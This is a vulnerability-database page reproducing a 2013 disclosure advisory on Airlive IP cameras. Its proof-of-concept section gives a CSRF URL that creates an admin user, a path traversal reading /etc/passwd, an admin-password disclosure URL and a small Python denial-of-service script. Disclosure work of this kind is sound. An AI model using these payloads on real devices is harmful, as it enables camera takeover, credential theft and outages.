Vulners
Lucene search
Airlive CSRF / Traversal / Disclosure / Denial Of Service
🗓️ 13 Jun 2013 00:00:00Reported by Javier Repiso SanchezType 
packetstorm🔗 packetstormsecurity.com👁 29 Views
| Reporter | Title | Published | Views | Family All 30 |
|---|---|---|---|---|
 | Airlive IP Cameras - Multiple Vulnerabilities | 13 Jun 201300:00 | – | zdt |
 | CVE-2013-3540 | 4 Oct 201323:00 | – | cve |
| CVE-2013-3541 | 4 Oct 201323:00 | – | cve |
| CVE-2013-3686 | 11 Oct 201321:00 | – | cve |
| CVE-2013-3687 | 11 Oct 201321:00 | – | cve |
| CVE-2013-3691 | 11 Dec 201918:22 | – | cve |
 | CVE-2013-3540 | 4 Oct 201323:00 | – | cvelist |
| CVE-2013-3541 | 4 Oct 201323:00 | – | cvelist |
| CVE-2013-3686 | 11 Oct 201321:00 | – | cvelist |
| CVE-2013-3687 | 11 Oct 201321:00 | – | cvelist |
10
`===========================================================================
AIRLIVE
====================================================================
===========================================================================
1.Advisory Information
Title: Airlive Multiple Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
Multiple vulnerabilities have been found in this devices:
-CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103)
-CVE-2013-3541. Relative Path Traversal(CWE-23).
-CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Priveleges and Access Controls(CWE-264)
-CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312)
-CVE-2013-3691. Denial of Service
3.Affected Products
CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM
CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.
Its possible others models are affected but they were not checked.
4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
In the following example we will make a vector to create an alternative user with administration credentials.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect=
_____________________________________________________________________________
4.2.Relative Path Traversal
CVE-2013-3541, Transversal Path thats allow you to read file system configuration.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd
_____________________________________________________________________________
4.3.Sensitive Information Exposure + Privilege Escalation
CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID
_____________________________________________________________________________
We can decode Admin password (base64).
Now we can relogin like admin user and we have made the escalation privilege
4.4.Clear Text Storage of Sensitive Information
CVE-2013-3687 You can find all the sensitive information about the device in plain text inside the backup file.
You can open with any text editor and look for user's information for example, passwords, users and so on.
4.5.Denial of Service (DoS)
Use CVE-2013-3691, DoS by overbuffing path /. A request with a large number of a can take down the http service from the camera device.
_____________________________________________________________________________
Request: http://xx.xx.xx.xx/[a*3000]
_____________________________________________________________________________
You will get the next message, Conexion has been reset. After remove de adds and refresh it you will get the next message, Can't Connect
It will be down for around 2min but if we are doing the request once and again each 1min for example, the camera wont recuperate ever itself
The following Python script could be used to test the DoS:
_____________________________________________________________________________
@ request = 'GET /' + A * 3000 + '.html HTTP/1.0\r\n'
@ s = socket.socket()
@ s.connect((cam_ip, 80))
@ s.send(request)
@ response = s.recv(1024)
@ s.close()
_____________________________________________________________________________
5.Credits
-CVE-2013-3541 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3691 was discovered by Javier Repiso Sánchez and Jonás Ropero Castillo
-CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jonás Ropero Castillo.
6.Report Timeline
-2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received.
-2013-06-03: Students asks for a reply.
-2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Jun 2013 00:00Current
7.5High risk
Vulners AI Score7.5
EPSS0.39574